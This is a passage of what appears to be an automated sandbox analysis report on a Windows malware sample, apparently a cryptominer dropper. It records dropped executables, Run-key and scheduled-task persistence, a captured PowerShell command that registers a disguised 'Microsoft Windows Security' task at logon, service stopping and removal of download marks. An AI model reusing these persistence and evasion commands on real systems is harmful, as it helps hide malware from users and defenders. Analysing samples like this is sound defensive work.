                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91061 Sleep,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,wsprintfW,wsprintfW,PathFileExistsW,rand,wsprintfW,strlen,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00A91061
                                Source: 28849683.exe.4.drStatic PE information: real checksum: 0x6517 should be: 0x659f
                                Source: sysppvrdnvs.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x232cd
                                Source: 513318274.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xa6a9
                                Source: jacrzswcvuml.tmp.35.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
                                Source: tdrpl[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x232cd
                                Source: 5232.scr.0.drStatic PE information: real checksum: 0x0 should be: 0x232cd
                                Source: nxmr[1].exe.28.drStatic PE information: section name: .xdata
                                Source: 1428024550.exe.28.drStatic PE information: section name: .xdata
                                Source: winupsecvmgr.exe.30.drStatic PE information: section name: .xdata
                                Source: jacrzswcvuml.tmp.35.drStatic PE information: section name: _RANDOMX
                                Source: jacrzswcvuml.tmp.35.drStatic PE information: section name: _TEXT_CN
                                Source: jacrzswcvuml.tmp.35.drStatic PE information: section name: _TEXT_CN
                                Source: jacrzswcvuml.tmp.35.drStatic PE information: section name: _RDATA
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91901 push ecx; ret 0_2_00A91914
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeCode function: 25_2_007E1821 push ecx; ret 25_2_007E1834
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeCode function: 28_2_00411AD1 push ecx; ret 28_2_00411AE4
                                Source: C:\Users\user\AppData\Local\Temp\15714163.exeCode function: 29_2_00011771 push ecx; ret 29_2_00011784
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4AACD2A5 pushad ; iretd 31_2_00007FFB4AACD2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ABE00BD pushad ; iretd 31_2_00007FFB4ABE00C1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ABE6A51 push edi; retf 31_2_00007FFB4ABE6A52
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ABE474D push ebp; retf 31_2_00007FFB4ABE4772
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ABE752B push ebx; iretd 31_2_00007FFB4ABE756A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB4F73 push eax; retf 31_2_00007FFB4ACB4F7A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5339 push esp; retf 31_2_00007FFB4ACB533A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5331 push ebx; retf 31_2_00007FFB4ACB5332
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB60F1 pushad ; retf 31_2_00007FFB4ACB60F2
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5710 push esi; retf 31_2_00007FFB4ACB5712
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5500 push esi; retf 31_2_00007FFB4ACB550A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5063 push edx; retf 31_2_00007FFB4ACB506A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5060 push eax; retf 31_2_00007FFB4ACB5062
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB5E59 pushad ; retf 31_2_00007FFB4ACB5E5A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFB4ACB05F1 push es; retf 31_2_00007FFB4ACB05FA
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A25AC push rsi; ret 38_2_00007FF6E69A25C6
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A5344 push rbp; retf 38_2_00007FF6E69A5347
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A533C push rbp; retf 38_2_00007FF6E69A533F
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A5354 push rsi; retf 38_2_00007FF6E69A535F
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A534C push rsp; retf 38_2_00007FF6E69A530F
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A534C push rbp; retf 38_2_00007FF6E69A534F
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A52E4 push rbp; retf 38_2_00007FF6E69A52E7
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A52D4 push rbp; retf 38_2_00007FF6E69A52DF
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A52CC push rbp; retf 38_2_00007FF6E69A52AF
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A52CC push rbp; retf 38_2_00007FF6E69A52DF
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A531C push rbp; retf 38_2_00007FF6E69A531F
                                Source: C:\Windows\System32\conhost.exeCode function: 38_2_00007FF6E69A532C push rbp; retf 38_2_00007FF6E69A532F

                                Persistence and Installation Behavior

                                barindex
                                Drops PE files with a suspicious file extension
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile created: C:\Users\user\AppData\Local\Temp\5232.scrJump to dropped file
                                Drops executables to the windows directory (C:\Windows) and starts them
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrExecutable created and started: C:\Windows\sysppvrdnvs.exeJump to behavior
                                Sample is not signed and drops a device driver
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeCode function: 0_2_00A91061 Sleep,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,wsprintfW,wsprintfW,PathFileExistsW,rand,wsprintfW,strlen,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_00A91061
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\28849683.exeJump to dropped file
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile created: C:\Users\user\AppData\Local\Temp\5232.scrJump to dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nxmr[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeFile created: C:\Users\user\AppData\Local\Temp\1428024550.exeJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\513318274.exeJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\2573513776.exeJump to dropped file
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exeJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\15714163.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeFile created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Windows\sysppvrdnvs.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Found hidden mapped module (file has been removed from disk)
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                                Hides that the sample has been downloaded from the Internet (zone.identifier)
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrFile opened: C:\Users\user\AppData\Local\Temp\5232.scr:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\415511255.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\1114023610.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\513318274.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\2573513776.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\28849683.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\15714163.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeFile opened: C:\Users\user\AppData\Local\Temp\1428024550.exe:Zone.Identifier read attributes | delete
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
